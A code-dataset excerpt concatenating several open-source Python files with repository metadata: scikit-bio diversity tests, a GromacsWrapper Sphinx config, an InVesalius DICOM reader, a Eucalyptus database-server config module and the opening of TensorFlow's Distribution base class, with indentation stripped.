counts = [1, 2]
otu_ids = ['OTU1', 'OTU2', 'OTU3']
self.assertRaises(ValueError, beta_diversity,
'weighted_unifrac', counts, otu_ids=otu_ids, tree=t)
self.assertRaises(ValueError, beta_diversity,
'unweighted_unifrac', counts, otu_ids=otu_ids,
tree=t)
# tree with no branch lengths
t = TreeNode.read(
io.StringIO('((((OTU1,OTU2),OTU3)),(OTU4,OTU5));'))
counts = [1, 2, 3]
otu_ids = ['OTU1', 'OTU2', 'OTU3']
self.assertRaises(ValueError, beta_diversity,
'weighted_unifrac', counts, otu_ids=otu_ids, tree=t)
self.assertRaises(ValueError, beta_diversity,
'unweighted_unifrac', counts, otu_ids=otu_ids,
tree=t)
# tree missing some branch lengths
t = TreeNode.read(
io.StringIO('(((((OTU1,OTU2:0.5):0.5,OTU3:1.0):1.0):0.0,(OTU4:'
'0.75,OTU5:0.75):1.25):0.0)root;'))
counts = [1, 2, 3]
otu_ids = ['OTU1', 'OTU2', 'OTU3']
self.assertRaises(ValueError, beta_diversity,
'weighted_unifrac', counts, otu_ids=otu_ids, tree=t)
self.assertRaises(ValueError, beta_diversity,
'unweighted_unifrac', counts, otu_ids=otu_ids,
tree=t)
# some otu_ids not present in tree
t = TreeNode.read(
io.StringIO(
'(((((OTU1:0.5,OTU2:0.5):0.5,OTU3:1.0):1.0):0.0,(OTU4:'
'0.75,OTU5:0.75):1.25):0.0)root;'))
counts = [1, 2, 3]
otu_ids = ['OTU1', 'OTU2', 'OTU42']
self.assertRaises(MissingNodeError, beta_diversity,
'weighted_unifrac', counts, otu_ids=otu_ids, tree=t)
self.assertRaises(MissingNodeError, beta_diversity,
'unweighted_unifrac', counts, otu_ids=otu_ids,
tree=t)
def test_empty(self):
# array of empty vectors
actual = beta_diversity('euclidean',
np.array([[], []], dtype=np.int64),
ids=['a', 'b'])
expected_dm = DistanceMatrix([[0.0, 0.0], [0.0, 0.0]], ['a', 'b'])
npt.assert_array_equal(actual, expected_dm)
actual = beta_diversity('unweighted_unifrac',
np.array([[], []], dtype=np.int64),
ids=['a', 'b'], tree=self.tree1, otu_ids=[])
expected_dm = DistanceMatrix([[0.0, 0.0], [0.0, 0.0]], ['a', 'b'])
self.assertEqual(actual, expected_dm)
def test_input_types(self):
actual_array = beta_diversity('euclidean',
np.array([[1, 5], [2, 3]]),
ids=['a', 'b'])
actual_list = beta_diversity('euclidean',
[[1, 5], [2, 3]], ids=['a', 'b'])
self.assertEqual(actual_array, actual_list)
def test_euclidean(self):
# TODO: update npt.assert_almost_equal calls to use DistanceMatrix
# near-equality testing when that support is available
actual_dm = beta_diversity('euclidean', self.table1, self.sids1)
self.assertEqual(actual_dm.shape, (3, 3))
npt.assert_almost_equal(actual_dm['A', 'A'], 0.0)
npt.assert_almost_equal(actual_dm['B', 'B'], 0.0)
npt.assert_almost_equal(actual_dm['C', 'C'], 0.0)
npt.assert_almost_equal(actual_dm['A', 'B'], 2.23606798)
npt.assert_almost_equal(actual_dm['B', 'A'], 2.23606798)
npt.assert_almost_equal(actual_dm['A', 'C'], 4.12310563)
npt.assert_almost_equal(actual_dm['C', 'A'], 4.12310563)
npt.assert_almost_equal(actual_dm['B', 'C'], 2.82842712)
npt.assert_almost_equal(actual_dm['C', 'B'], 2.82842712)
actual_dm = beta_diversity('euclidean', self.table2, self.sids2)
expected_data = [
[0., 80.8455317, 84.0297566, 36.3042697, 86.0116271, 78.9176786],
[80.8455317, 0., 71.0844568, 74.4714710, 69.3397433, 14.422205],
[84.0297566, 71.0844568, 0., 77.2851861, 8.3066238, 60.7536007],
[36.3042697, 74.4714710, 77.2851861, 0., 78.7908624, 70.7389567],
[86.0116271, 69.3397433, 8.3066238, 78.7908624, 0., 58.4807660],
[78.9176786, 14.422205, 60.7536007, 70.7389567, 58.4807660, 0.]]
expected_dm = DistanceMatrix(expected_data, self.sids2)
for id1 in self.sids2:
for id2 in self.sids2:
npt.assert_almost_equal(actual_dm[id1, id2],
expected_dm[id1, id2], 6)
def test_braycurtis(self):
# TODO: update npt.assert_almost_equal calls to use DistanceMatrix
# near-equality testing when that support is available
actual_dm = beta_diversity('braycurtis', self.table1, self.sids1)
self.assertEqual(actual_dm.shape, (3, 3))
npt.assert_almost_equal(actual_dm['A', 'A'], 0.0)
npt.assert_almost_equal(actual_dm['B', 'B'], 0.0)
npt.assert_almost_equal(actual_dm['C', 'C'], 0.0)
npt.assert_almost_equal(actual_dm['A', 'B'], 0.27272727)
npt.assert_almost_equal(actual_dm['B', 'A'], 0.27272727)
npt.assert_almost_equal(actual_dm['A', 'C'], 0.71428571)
npt.assert_almost_equal(actual_dm['C', 'A'], 0.71428571)
npt.assert_almost_equal(actual_dm['B', 'C'], 0.66666667)
npt.assert_almost_equal(actual_dm['C', 'B'], 0.66666667)
actual_dm = beta_diversity('braycurtis', self.table2, self.sids2)
expected_data = [
[0., 0.78787879, 0.86666667, 0.30927835, 0.85714286, 0.81521739],
[0.78787879, 0., 0.78142077, 0.86813187, 0.75, 0.1627907],
[0.86666667, 0.78142077, 0., 0.87709497, 0.09392265, 0.71597633],
[0.30927835, 0.86813187, 0.87709497, 0., 0.87777778, 0.89285714],
[0.85714286, 0.75, 0.09392265, 0.87777778, 0., 0.68235294],
[0.81521739, 0.1627907, 0.71597633, 0.89285714, 0.68235294, 0.]]
expected_dm = DistanceMatrix(expected_data, self.sids2)
for id1 in self.sids2:
for id2 in self.sids2:
npt.assert_almost_equal(actual_dm[id1, id2],
expected_dm[id1, id2], 6)
def test_unweighted_unifrac(self):
# TODO: update npt.assert_almost_equal calls to use DistanceMatrix
# near-equality testing when that support is available
# expected values calculated by hand
dm1 = beta_diversity('unweighted_unifrac', self.table1, self.sids1,
otu_ids=self.oids1, tree=self.tree1)
dm2 = beta_diversity(unweighted_unifrac, self.table1, self.sids1,
otu_ids=self.oids1, tree=self.tree1)
self.assertEqual(dm1.shape, (3, 3))
self.assertEqual(dm1, dm2)
expected_data = [[0.0, 0.0, 0.25],
[0.0, 0.0, 0.25],
[0.25, 0.25, 0.0]]
expected_dm = DistanceMatrix(expected_data, ids=self.sids1)
for id1 in self.sids1:
for id2 in self.sids1:
npt.assert_almost_equal(dm1[id1, id2],
expected_dm[id1, id2], 6)
def test_weighted_unifrac(self):
# TODO: update npt.assert_almost_equal calls to use DistanceMatrix
# near-equality testing when that support is available
# expected values calculated by hand
dm1 = beta_diversity('weighted_unifrac', self.table1, self.sids1,
otu_ids=self.oids1, tree=self.tree1)
dm2 = beta_diversity(weighted_unifrac, self.table1, self.sids1,
otu_ids=self.oids1, tree=self.tree1)
self.assertEqual(dm1.shape, (3, 3))
self.assertEqual(dm1, dm2)
expected_data = [
[0.0, 0.1750000, 0.12499999],
[0.1750000, 0.0, 0.3000000],
[0.12499999, 0.3000000, 0.0]]
expected_dm = DistanceMatrix(expected_data, ids=self.sids1)
for id1 in self.sids1:
for id2 in self.sids1:
npt.assert_almost_equal(dm1[id1, id2],
expected_dm[id1, id2], 6)
def test_weighted_unifrac_normalized(self):
# TODO: update npt.assert_almost_equal calls to use DistanceMatrix
# near-equality testing when that support is available
# expected values calculated by hand
dm1 = beta_diversity('weighted_unifrac', self.table1, self.sids1,
otu_ids=self.oids1, tree=self.tree1,
normalized=True)
dm2 = beta_diversity(weighted_unifrac, self.table1, self.sids1,
otu_ids=self.oids1, tree=self.tree1,
normalized=True)
self.assertEqual(dm1.shape, (3, 3))
self.assertEqual(dm1, dm2)
expected_data = [
[0.0, 0.128834, 0.085714],
[0.128834, 0.0, 0.2142857],
[0.085714, 0.2142857, 0.0]]
expected_dm = DistanceMatrix(expected_data, ids=self.sids1)
for id1 in self.sids1:
for id2 in self.sids1:
npt.assert_almost_equal(dm1[id1, id2],
expected_dm[id1, id2], 6)
def test_scipy_kwargs(self):
# confirm that p can be passed to SciPy's minkowski, and that it
# gives a different result than not passing it (the off-diagonal
# entries are not equal).
dm1 = beta_diversity('minkowski', self.table1, self.sids1)
dm2 = beta_diversity('minkowski', self.table1, self.sids1, p=42.0)
for id1 in self.sids1:
for id2 in self.sids1:
if id1 != id2:
self.assertNotEqual(dm1[id1, id2], dm2[id1, id2])
def test_alt_pairwise_func(self):
# confirm that pairwise_func is actually being used
def not_a_real_pdist(counts, metric):
return [[0.0, 42.0], [42.0, 0.0]]
dm1 = beta_diversity('unweighted_unifrac', self.table1,
otu_ids=self.oids1, tree=self.tree1,
pairwise_func=not_a_real_pdist)
expected = DistanceMatrix([[0.0, 42.0], [42.0, 0.0]])
self.assertEqual(dm1, expected)
dm1 = beta_diversity('weighted_unifrac', self.table1,
otu_ids=self.oids1, tree=self.tree1,
pairwise_func=not_a_real_pdist)
expected = DistanceMatrix([[0.0, 42.0], [42.0, 0.0]])
self.assertEqual(dm1, expected)
dm1 = beta_diversity(unweighted_unifrac, self.table1,
otu_ids=self.oids1, tree=self.tree1,
pairwise_func=not_a_real_pdist)
expected = DistanceMatrix([[0.0, 42.0], [42.0, 0.0]])
self.assertEqual(dm1, expected)
dm1 = beta_diversity("euclidean", self.table1,
pairwise_func=not_a_real_pdist)
expected = DistanceMatrix([[0.0, 42.0], [42.0, 0.0]])
self.assertEqual(dm1, expected)
class MetricGetters(TestCase):
def test_get_alpha_diversity_metrics(self):
m = get_alpha_diversity_metrics()
# basic sanity checks
self.assertTrue('faith_pd' in m)
self.assertTrue('chao1' in m)
def test_get_alpha_diversity_metrics_sorted(self):
m = get_alpha_diversity_metrics()
n = sorted(list(m))
self.assertEqual(m, n)
def test_get_beta_diversity_metrics(self):
m = get_beta_diversity_metrics()
# basic sanity checks
self.assertTrue('unweighted_unifrac' in m)
self.assertTrue('weighted_unifrac' in m)
def test_get_beta_diversity_metrics_sorted(self):
m = get_beta_diversity_metrics()
n = sorted(list(m))
self.assertEqual(m, n)
if __name__ == "__main__":
main()
|
anderspitman/scikit-bio
|
skbio/diversity/tests/test_driver.py
|
Python
|
bsd-3-clause
| 29,199
|
[
"scikit-bio"
] |
f8d4d9258bb40a7f0f44ab156f0ef0771c572d3c213dc032e8343eb7ac46f0e3
|
# -*- coding: utf-8 -*-
#
# GromacsWrapper documentation build configuration file, created by
# sphinx-quickstart on Tue Jun 23 19:38:56 2009.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# The contents of this file are pickled, so don't put values in the namespace
# that aren't pickleable (module imports are okay, they're removed automatically).
#
# All configuration values have a default value; values that are commented out
# serve to show the default value.
import sys, os
# If your extensions are in another directory, add it here. If the directory
# is relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#sys.path.append(os.path.abspath('some/directory'))
# General configuration
# ---------------------
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.intersphinx']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['.templates']
# The suffix of source filenames.
source_suffix = '.txt'
# The master toctree document.
master_doc = 'index'
# General substitutions.
project = u'GromacsWrapper'
copyright = u'2009-2016, The Authors of GromacsWrapper (see AUTHORS)'
# The default replacements for |version| and |release|, also used in various
# other places throughout the built documents.
#
# Dynamically calculate the version based on __init__.VERSION.
packageversion = __import__('gromacs').get_version()
# The short X.Y version.
version = '.'.join(packageversion.split('.')[:2])
# The full version, including alpha/beta/rc tags.
release = packageversion
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# List of directories, relative to source directories, that shouldn't be searched
# for source files.
exclude_trees = []
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# Options for HTML output
# -----------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'sphinxdoc'
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
html_logo = "logos/GromacsWrapper_logo_200x200.png"
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
html_favicon = "logos/GromacsWrapper_logo_32x32.ico"
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['.static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, the reST sources are included in the HTML build as _sources/<name>.
#html_copy_source = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'GromacsWrapperdoc'
# Options for LaTeX output
# ------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, document class [howto/manual]).
latex_documents = [
('index', 'GromacsWrapper.tex', u'GromacsWrapper Documentation',
u'Oliver Beckstein', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
# Options for ext.intersphinx
# ---------------------------
# intersphinx: reference standard lib and RecSQL
# http://sphinx.pocoo.org/latest/ext/intersphinx.html
intersphinx_mapping = {'http://docs.python.org/': None,
'http://docs.scipy.org/doc/numpy/': None,
'http://docs.scipy.org/doc/scipy/reference/': None,
'http://orbeckst.github.com/RecSQL/': None}
# Options for ext.autodoc
# -----------------------
# see http://sphinx.pocoo.org/ext/autodoc.html
# This value selects what content will be inserted into the main body of an autoclass directive.
# "class", "init", "both"
autoclass_content = "both"
|
jandom/GromacsWrapper
|
doc/sphinx/source/conf.py
|
Python
|
gpl-3.0
| 6,620
|
[
"Gromacs"
] |
0e9941eb9367063f6ae488c9bd5fd965920ec102594fb3cbe96e507725ddff94
|
#--------------------------------------------------------------------------
# Software: InVesalius - Software de Reconstrucao 3D de Imagens Medicas
# Copyright: (C) 2001 Centro de Pesquisas Renato Archer
# Homepage: http://www.softwarepublico.gov.br
# Contact: invesalius@cti.gov.br
# License: GNU - GPL 2 (LICENSE.txt/LICENCA.txt)
#--------------------------------------------------------------------------
# Este programa e software livre; voce pode redistribui-lo e/ou
# modifica-lo sob os termos da Licenca Publica Geral GNU, conforme
# publicada pela Free Software Foundation; de acordo com a versao 2
# da Licenca.
#
# Este programa eh distribuido na expectativa de ser util, mas SEM
# QUALQUER GARANTIA; sem mesmo a garantia implicita de
# COMERCIALIZACAO ou de ADEQUACAO A QUALQUER PROPOSITO EM
# PARTICULAR. Consulte a Licenca Publica Geral GNU para obter mais
# detalhes.
#--------------------------------------------------------------------------
import os
import Queue
import threading
from multiprocessing import cpu_count
import vtk
import gdcm
import wx.lib.pubsub as ps
import constants as const
import dicom
import dicom_grouper
import session
def ReadDicomGroup(dir_):
patient_group = GetDicomGroups(dir_)
if len(patient_group) > 0:
filelist, dicom, zspacing = SelectLargerDicomGroup(patient_group)
filelist = SortFiles(filelist, dicom)
size = dicom.image.size
bits = dicom.image.bits_allocad
imagedata = CreateImageData(filelist, zspacing, size, bits)
session.Session().project_status = const.NEW_PROJECT
return imagedata, dicom
else:
return False
def SelectLargerDicomGroup(patient_group):
maxslices = 0
for patient in patient_group:
group_list = patient.GetGroups()
for group in group_list:
if group.nslices > maxslices:
maxslices = group.nslices
larger_group = group
return larger_group
def SortFiles(filelist, dicom):
# Sort slices
# FIXME: Coronal Crash. necessary verify
if (dicom.image.orientation_label <> "CORONAL"):
#Organize reversed image
sorter = gdcm.IPPSorter()
sorter.SetComputeZSpacing(True)
sorter.SetZSpacingTolerance(1e-10)
sorter.Sort(filelist)
#Getting organized image
filelist = sorter.GetFilenames()
return filelist
class LoadDicom(threading.Thread):
def __init__(self, grouper, q, l):
threading.Thread.__init__(self)
self.grouper = grouper
self.q = q
self.l = l
def run(self):
grouper = self.grouper
q = self.q
while 1:
filepath = q.get()
if not filepath:
break
parser = dicom.Parser()
if parser.SetFileName(filepath):
dcm = dicom.Dicom()
self.l.acquire()
dcm.SetParser(parser)
grouper.AddFile(dcm)
self.l.release()
def yGetDicomGroups(directory, recursive=True, gui=True):
"""
Return all full paths to DICOM files inside given directory.
"""
nfiles = 0
# Find total number of files
if recursive:
for dirpath, dirnames, filenames in os.walk(directory):
nfiles += len(filenames)
else:
dirpath, dirnames, filenames = os.walk(directory)
nfiles = len(filenames)
counter = 0
grouper = dicom_grouper.DicomPatientGrouper()
q = Queue.Queue()
l = threading.Lock()
threads = []
for i in xrange(cpu_count()):
t = LoadDicom(grouper, q, l)
t.start()
threads.append(t)
# Retrieve only DICOM files, splited into groups
if recursive:
for dirpath, dirnames, filenames in os.walk(directory):
for name in filenames:
filepath = os.path.join(dirpath, name)
counter += 1
if gui:
yield (counter,nfiles)
q.put(filepath)
else:
dirpath, dirnames, filenames = os.walk(directory)
for name in filenames:
filepath = str(os.path.join(dirpath, name))
counter += 1
if gui:
yield (counter,nfiles)
q.put(filepath)
for t in threads:
q.put(0)
for t in threads:
t.join()
#TODO: Is this commented update necessary?
#grouper.Update()
yield grouper.GetPatientsGroups()
def GetDicomGroups(directory, recursive=True):
return yGetDicomGroups(directory, recursive, gui=False).next()
class ProgressDicomReader:
def __init__(self):
ps.Publisher().subscribe(self.CancelLoad, "Cancel DICOM load")
def CancelLoad(self, evt_pubsub):
self.running = False
self.stoped = True
def SetWindowEvent(self, frame):
self.frame = frame
def SetDirectoryPath(self, path,recursive=True):
self.running = True
self.stoped = False
self.GetDicomGroups(path,recursive)
def UpdateLoadFileProgress(self,cont_progress):
ps.Publisher().sendMessage("Update dicom load", cont_progress)
def EndLoadFile(self, patient_list):
ps.Publisher().sendMessage("End dicom load", patient_list)
def GetDicomGroups(self, path, recursive):
if not const.VTK_WARNING:
log_path = os.path.join(const.LOG_FOLDER, 'vtkoutput.txt')
fow = vtk.vtkFileOutputWindow()
fow.SetFileName(log_path)
ow = vtk.vtkOutputWindow()
ow.SetInstance(fow)
y = yGetDicomGroups(path, recursive)
for value_progress in y:
if not self.running:
break
if isinstance(value_progress, tuple):
self.UpdateLoadFileProgress(value_progress)
else:
self.EndLoadFile(value_progress)
#Is necessary in the case user cancel
#the load, ensure that dicomdialog is closed
if(self.stoped):
self.UpdateLoadFileProgress(None)
self.stoped = False
|
tatiana/invesalius
|
invesalius/reader/dicom_reader.py
|
Python
|
gpl-2.0
| 6,119
|
[
"VTK"
] |
5716333302593cd26540a4dd2f2da0c9809e65ee2267ed39128cd8bbb7bce369
|
# Copyright 2009-2014 Eucalyptus Systems, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; version 3 of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see http://www.gnu.org/licenses/.
#
# Please contact Eucalyptus Systems, Inc., 6755 Hollister Ave., Goleta
# CA 93117, USA or visit http://www.eucalyptus.com/licenses/ if you need
# additional information or have any questions.
#
# Order matters here. We want to make sure we initialize logging before anything
# else happens. We need to initialize the logger that boto will be using.
#
import os
PGSQL_DIR = "/usr/pgsql-9.2/"
LOG_ROOT = "/var/log/eucalyptus-database-server"
RUN_ROOT = "/var/lib/eucalyptus-database-server"
SCRIPT_ROOT = "/usr/libexec/eucalyptus-database-server"
CONF_ROOT = "/etc/eucalyptus-database-server"
PARTITION_SCRIPT = os.path.join(SCRIPT_ROOT, "vol-partition")
PG_RUN_DIR = os.path.join(RUN_ROOT, "pgsql")
PG_DATA_DIR = os.path.join(PG_RUN_DIR, "data")
DB_PASSWORD_FILE = os.path.join(RUN_ROOT, "db_pass.in")
DB_PORT = "5432"
DATABASES = ["eucalyptus_cloudwatch_backend", "eucalyptus_reporting_backend"]
DEFAULT_PID_ROOT = "/var/run/eucalyptus-database-server"
DEFAULT_PIDFILE = os.path.join(DEFAULT_PID_ROOT, "eucadb.pid")
CONFIG_FILE = CONF_ROOT + "/database-server.conf"
pidfile = DEFAULT_PIDFILE
SERVER_CERT_ARN = None
SERVER_CERT_CRT = None
SERVER_CERT_KEY = None
MASTER_PASSWORD_ENCRYPTED = None
VOLUME_ID = None
DEVICE_TO_ATTACH = '/dev/vdc'
user_data_store = {}
def set_pidfile(filename):
global pidfile
global pidroot
pidfile = filename
pidroot = os.path.dirname(pidfile)
def read_config_file():
try:
f = open(CONFIG_FILE)
content = f.read()
lines = content.split('\n')
for l in lines:
if len(l.strip()):
kv = l.split('=', 1)
if len(kv) == 2:
user_data_store[kv[0]] = kv[1]
except Exception, err:
raise Exception('Could not read configuration file due to %s' % err)
def get_value(key, optional=False):
if key in user_data_store:
return user_data_store[key]
else:
read_config_file()
if key in user_data_store:
return user_data_store[key]
else:
if not optional:
raise Exception('could not find %s' % key)
else:
return None
def get_compute_service_url():
return get_value('compute_service_url')
def get_euare_service_url():
return get_value('euare_service_url')
def get_ntp_server_url():
return get_value('ntp_server')
def get_volume_id():
return get_value('volume_id')
def get_master_password_encrypted():
return get_value('master_password_encrypted')
def get_server_cert_arn():
return get_value('server_cert_arn')
|
eucalyptus/eucalyptus-database-server
|
eucadb/config.py
|
Python
|
bsd-2-clause
| 3,228
|
[
"VisIt"
] |
fb7f2d9ccd077e28db50dcf69d5ff79bc4fdc3a01e2de6b9b93e637a1f649588
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Base classes for probability distributions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import contextlib
import types
import numpy as np
import six
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops.distributions import util
from tensorflow.python.util import tf_inspect
_DISTRIBUTION_PUBLIC_METHOD_WRAPPERS = [
"batch_shape_tensor", "batch_shape", "event_shape_tensor", "event_shape",
"sample", "log_prob", "prob", "log_cdf", "cdf", "log_survival_function",
"survival_function", "entropy", "mean", "variance", "stddev", "mode",
"covariance"]
@six.add_metaclass(abc.ABCMeta)
class _BaseDistribution(object):
"""Abstract base class needed for resolving subclass hierarchy."""
pass
def _copy_fn(fn):
"""Create a deep copy of fn.
Args:
fn: a callable
Returns:
A `FunctionType`: a deep copy of fn.
Raises:
TypeError: if `fn` is not a callable.
"""
if not callable(fn):
raise TypeError("fn is not callable: %s" % fn)
# The blessed way to copy a function. copy.deepcopy fails to create a
# non-reference copy. Since:
# types.FunctionType == type(lambda: None),
# and the docstring for the function type states:
#
# function(code, globals[, name[, argdefs[, closure]]])
#
# Create a function object from a code object and a dictionary.
# ...
#
# Here we can use this to create a new function with the old function's
# code, globals, closure, etc.
return types.FunctionType(
code=fn.__code__, globals=fn.__globals__,
name=fn.__name__, argdefs=fn.__defaults__,
closure=fn.__closure__)
def _update_docstring(old_str, append_str):
"""Update old_str by inserting append_str just before the "Args:" section."""
old_str = old_str or ""
old_str_lines = old_str.split("\n")
# Step 0: Prepend spaces to all lines of append_str. This is
# necessary for correct markdown generation.
append_str = "\n".join(" %s" % line for line in append_str.split("\n"))
# Step 1: Find mention of "Args":
has_args_ix = [
ix for ix, line in enumerate(old_str_lines)
if line.strip().lower() == "args:"]
if has_args_ix:
final_args_ix = has_args_ix[-1]
return ("\n".join(old_str_lines[:final_args_ix])
+ "\n\n" + append_str + "\n\n"
+ "\n".join(old_str_lines[final_args_ix:]))
else:
return old_str + "\n\n" + append_str
class _DistributionMeta(abc.ABCMeta):
def __new__(mcs, classname, baseclasses, attrs):
"""Control the creation of subclasses of the Distribution class.
The main purpose of this method is to properly propagate docstrings
from private Distribution methods, like `_log_prob`, into their
public wrappers as inherited by the Distribution base class
(e.g. `log_prob`).
Args:
classname: The name of the subclass being created.
baseclasses: A tuple of parent classes.
attrs: A dict mapping new attributes to their values.
Returns:
The class object.
Raises:
TypeError: If `Distribution` is not a subclass of `BaseDistribution`, or
the new class is derived via multiple inheritance and the first
parent class is not a subclass of `BaseDistribution`.
AttributeError: If `Distribution` does not implement e.g. `log_prob`.
ValueError: If a `Distribution` public method lacks a docstring.
"""
if not baseclasses: # Nothing to be done for Distribution
raise TypeError("Expected non-empty baseclass. Does Distribution "
"not subclass _BaseDistribution?")
which_base = [
base for base in baseclasses
if base == _BaseDistribution or issubclass(base, Distribution)]
base = which_base[0]
if base == _BaseDistribution: # Nothing to be done for Distribution
return abc.ABCMeta.__new__(mcs, classname, baseclasses, attrs)
if not issubclass(base, Distribution):
raise TypeError("First parent class declared for %s must be "
"Distribution, but saw '%s'" % (classname, base.__name__))
for attr in _DISTRIBUTION_PUBLIC_METHOD_WRAPPERS:
special_attr = "_%s" % attr
class_attr_value = attrs.get(attr, None)
if attr in attrs:
# The method is being overridden, do not update its docstring
continue
base_attr_value = getattr(base, attr, None)
if not base_attr_value:
raise AttributeError(
"Internal error: expected base class '%s' to implement method '%s'"
% (base.__name__, attr))
class_special_attr_value = attrs.get(special_attr, None)
if class_special_attr_value is None:
# No _special method available, no need to update the docstring.
continue
class_special_attr_docstring = tf_inspect.getdoc(class_special_attr_value)
if not class_special_attr_docstring:
# No docstring to append.
continue
class_attr_value = _copy_fn(base_attr_value)
class_attr_docstring = tf_inspect.getdoc(base_attr_value)
if class_attr_docstring is None:
raise ValueError(
"Expected base class fn to contain a docstring: %s.%s"
% (base.__name__, attr))
class_attr_value.__doc__ = _update_docstring(
class_attr_value.__doc__,
("Additional documentation from `%s`:\n\n%s"
% (classname, class_special_attr_docstring)))
attrs[attr] = class_attr_value
return abc.ABCMeta.__new__(mcs, classname, baseclasses, attrs)
class ReparameterizationType(object):
"""Instances of this class represent how sampling is reparameterized.
Two static instances exist in the distributions library, signifying
one of two possible properties for samples from a distribution:
`FULLY_REPARAMETERIZED`: Samples from the distribution are fully
reparameterized, and straight-through gradients are supported.
`NOT_REPARAMETERIZED`: Samples from the distribution are not fully
reparameterized, and straight-through gradients are either partially
unsupported or are not supported at all. In this case, for purposes of
e.g. RL or variational inference, it is generally safest to wrap the
sample results in a `stop_gradients` call and instead use policy
gradients / surrogate loss instead.
"""
def __init__(self, rep_type):
self._rep_type = rep_type
def __repr__(self):
return "<Reparameteriation Type: %s>" % self._rep_type
def __eq__(self, other):
"""Determine if this `ReparameterizationType` is equal to another.
Since RepaparameterizationType instances are constant static global
instances, equality checks if two instances' id() values are equal.
Args:
other: Object to compare against.
Returns:
`self is other`.
"""
return self is other
# Fully reparameterized distribution: samples from a fully
# reparameterized distribution support straight-through gradients with
# respect to all parameters.
FULLY_REPARAMETERIZED = ReparameterizationType("FULLY_REPARAMETERIZED")
# Not reparameterized distribution: samples from a non-
# reparameterized distribution do not support straight-through gradients for
# at least some of the parameters.
NOT_REPARAMETERIZED = ReparameterizationType("NOT_REPARAMETERIZED")
@six.add_metaclass(_DistributionMeta)
class Distribution(_BaseDistribution):
"""A generic probability distribution base class.
`Distribution` is a base class for constructing and organizing properties
(e.g., mean, variance) of random variables (e.g, Bernoulli, Gaussian).
#### Subclassing
Subclasses are expected to implement a leading-underscore version of the
same-named function. The argument signature should be identical except for
the omission of `name="..."`. For example, to enable `log_prob(value,
name="log_prob")` a subclass should implement `_log_prob(value)`.
Subclasses can append to public-level docstrings by providing
docstrings for their method specializations. For example:
```python
@util.AppendDocstring("Some other details.")
def _log_prob(self, value):
...
```
would add the string "Some other details." to the `log_prob` function
docstring. This is implemented as a simple decorator to avoid python
linter complaining about missing Args/Returns/Raises sections in the
partial docstrings.
#### Broadcasting, batching, and shapes
All distributions support batches of independent distributions of that type.
The batch shape is determined by broadcasting together the parameters.
The shape of arguments to `__init__`, `cdf`, `log_cdf`, `prob`, and
`log_prob` reflect this broadcasting, as does the return value of `sample` and
`sample_n`.
`sample_n_shape = [n] + batch_shape + event_shape`, where `sample_n_shape` is
the shape of the `Tensor` returned from `sample_n`, `n` is the number of
samples, `batch_shape` defines how many independent distributions there are,
